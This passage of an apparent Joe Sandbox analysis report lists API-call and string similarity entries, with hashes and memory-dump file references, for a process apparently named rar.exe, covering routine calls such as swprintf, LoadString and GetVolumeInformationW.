                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2319E22B08BC295EB10AF55E4507EDA3A0FB547A4F900032EF0D17B59DE3DE526A730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                              • API String ID: 233258989-2525383582
                                                                                                                                                                                                                              • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                              • Instruction ID: 41a944a20f68f6cf99aae928c19b311835e6591a7d7edb2e9fc9fbe80a3f1160
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8731A622A086C252EB10EF65E8013E9A7E0EB457A0FD00232EE5D1769ADE3CD516D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                              • String ID: Adding %-58s
                                                                                                                                                                                                                              • API String ID: 2948472770-2059140559
                                                                                                                                                                                                                              • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction ID: 38bdd8782474ebeb28b9754ef95489f6236ef97d4432206352fce10b0ce30aea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20116375B14B8189EB14AF16E8401A4F7E1FB94FE0FA48435CE0C93328DE3CE9568264
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%%0%du
                                                                                                                                                                                                                              • API String ID: 233258989-2249936285
                                                                                                                                                                                                                              • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction ID: ea365221d47b90c85a7043414772b6f02c69430921046132aecea256a1b89764
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1511C822B086C146E720AF24E4103E9B3A0FF88BA8F844031DF4D4779ADE3CD955DB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8B42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8B430F
                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00007FF7CF8A0BED,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A337E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                              • String ID: FAT$FAT32
                                                                                                                                                                                                                              • API String ID: 989755765-1174603449
                                                                                                                                                                                                                              • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction ID: 2663bf8c078fc285894256aeb9c046836fc9538710061dd82e8800ef9faf38f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2116021A1CAC245EB60AF50E8812E6A3E0FF84754FD05031EA4D83A9ADF2DE1249B30
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                              • API String ID: 564652978-2248577382
                                                                                                                                                                                                                              • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction ID: 42d7540023a26d521686e857ece690a6d8567f2bcac64f3aab840949fff195d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CE01A72E088824AEA08BF24BC820F4B2D0AF61774FD05330D03E821E59F2CA566A331